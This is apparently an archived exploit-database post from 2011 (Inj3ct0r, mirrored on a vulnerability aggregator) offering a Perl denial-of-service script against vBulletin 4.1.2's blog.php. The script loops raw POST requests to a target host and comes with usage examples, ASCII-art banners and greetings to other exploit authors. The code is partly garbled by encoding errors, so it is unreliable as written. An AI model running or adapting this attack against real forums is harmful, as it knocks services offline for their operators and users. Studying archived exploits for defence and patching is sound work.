Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25615
HistoryFeb 04, 2011 - 12:00 a.m.

vBulletin 4.1.2 0-day Denial Of Service Exploit

2011-02-0400:00:00
vulners.com
42

=========================================

vBulletin 4.1.2
0-day Denial Of
Service Exploit

=========================================

         The

largest Exploit
Database in the
world !

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0 _


__

1 /' \
__ /'`\ /\
\
/'__`\

0 /\, \ ___
/\
\/\_\ \ \ __\
\ ,
\/\ \/\ \ _ ___

1 \//\ \ /' _ `\
\/\ \/
/\<_
/'_\ \ \/\ \ \ \
\/\`'
\ 0

0 \ \ \/\ \/\ \
\ \ \/\ \ \ \/\
\__/\ \ \\ \ \\ \
\ \/ 1

1 \ \\ \\
\\\ \ \ \/\
\
\\ \__\\
\___/\ \\

0
\//\//\//\ \\
\// \//
\// \/
/ \/_/

1
\ \____/ >> Exploit
database separated
by exploit 0

0
\/___/ type
(local, remote, DoS,
etc.) 1

1

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Site
: Inj3ct0r is gonna
be up

Created again by

SeeMe

Greetz to

Sid3^effects,
Indoushka,
The_Exploited,
gunslinger,
Sn!pEr.S!Te,
n4pst3r,

SONiC, Th3 RDX,

agix, anT!-Tr0J4n,
eidelweiss, r0073r,
L0rd CruSad3r

Vbulletin 4.1.2

0-day tested & passed

#Perl Script
use Socket;
if (@ARGV < 2) {
&usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~
s/(http:\/\/)//eg;
for ($i=0; $i<10;
$iā€“)
{
$user="vb".$rand.$i;
$data = "s=&"
;
$len = length $data;
$foo = "POST
".$dir."blog.php
HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language:
en-gb\r\n".
"Content-Type:
application/x-www-form-urlencoded\r\n".
"Accept-Encoding:
gzip, deflate\r\n".
"User-Agent:
Mozilla/4.0
(compatible; MSIE
6.0; Windows NT
5.0)\r\n".
"Host: $host\r\n".
"Content-Length:
$len\r\n".
"Connection:
Keep-Alive\r\n".
"Cache-Control:
no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto =
getprotobyname('tcp');
socket(SOCKET,
PF_INET,
SOCK_STREAM, $proto);
connect(SOCKET,
sockaddr_in($port,
inet_aton($host)))
|| redo;
send(SOCKET,"$foo",
0);
syswrite STDOUT,
"+" ;
}
print "\n\n";
system('ping
$host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0
127.0.0.1 /forum/\n";
print "\tex2: $0
127.0.0.1 /\n\n";
exit();
};

################################

Greetz to all

inj3ct0r Crew #
################################